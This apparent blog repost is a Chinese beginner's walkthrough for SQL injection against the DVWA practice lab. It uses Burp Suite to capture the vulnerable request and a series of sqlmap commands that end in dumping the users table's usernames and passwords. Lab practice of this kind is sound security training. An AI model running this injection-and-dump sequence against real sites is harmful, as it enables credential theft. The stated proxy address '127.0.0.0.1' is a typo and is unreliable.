使用burpsuite抓包 + sql工具注入 dvwa靶场
记录一下自己重新开始学习web安全之路②。
一、准备工作
1.工具准备 sqlmap + burpsuite
2.浏览器准备 火狐浏览器 + 设置代理。
首先,先设置一下火狐浏览器的代理
http代理地址为127.0.0.0.1 ,端口为8080
3.burpsuite 准备 将burpsuite的抓包功能打开。
注:burpsuite 不抓127.0.0.1 /dvwa-master的包,所以需要用本地网卡 ip/dvwa-master 访问
怎么查到本地网卡ip?
在cmd中输入ipconfig
得到本地网卡ip 192.168.92.1
如果是无线网,那么找无线网适配器的IPV4地址
通过本地网卡ip进入dvwa,把安全等级改为low等级,,设置代理之后。
在搜索框输入之后,点击submit。
通过burpsuite抓包得到
注:抓到的包必须是注入点的包。
如:
(GET /dvwa-master/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1)即有?id=1,2等
然后在burpsuite中 点击Action — Save item 保存到本地。
保存之后,利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。
目标:拿账号密码(数据)
1.查询数据库的名称 (dvwa)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db
-r // 指定读取本地文件
–current-db //列出当前网站数据库名称
2.查询数据表的名称 (guestbook 、users)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables
-D //指定数据库名称
–tables //数据表
3.查询数据列的名称 (user 、password)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns
-T //指定数据表的名称
–columns //列出数据列的名称
4.读取数据 (user、password)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump
-C //指定数据列的名称
–dump // 读取数据
拿账号密码时遇到的问题:
1.首先是burpsuite抓包时 火狐浏览器显示
文章来源:https://www.toymoban.com/news/detail-729973.html
通过百度得到解决办法:
文章来源地址https://www.toymoban.com/news/detail-729973.html
2.sqlmap,更新问题,可以不用管,但是一开始看到有警告,去官网下了一个新的sqlmap即可。
到了这里,关于使用burpsuite抓包 + sql工具注入 dvwa初级靶场的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!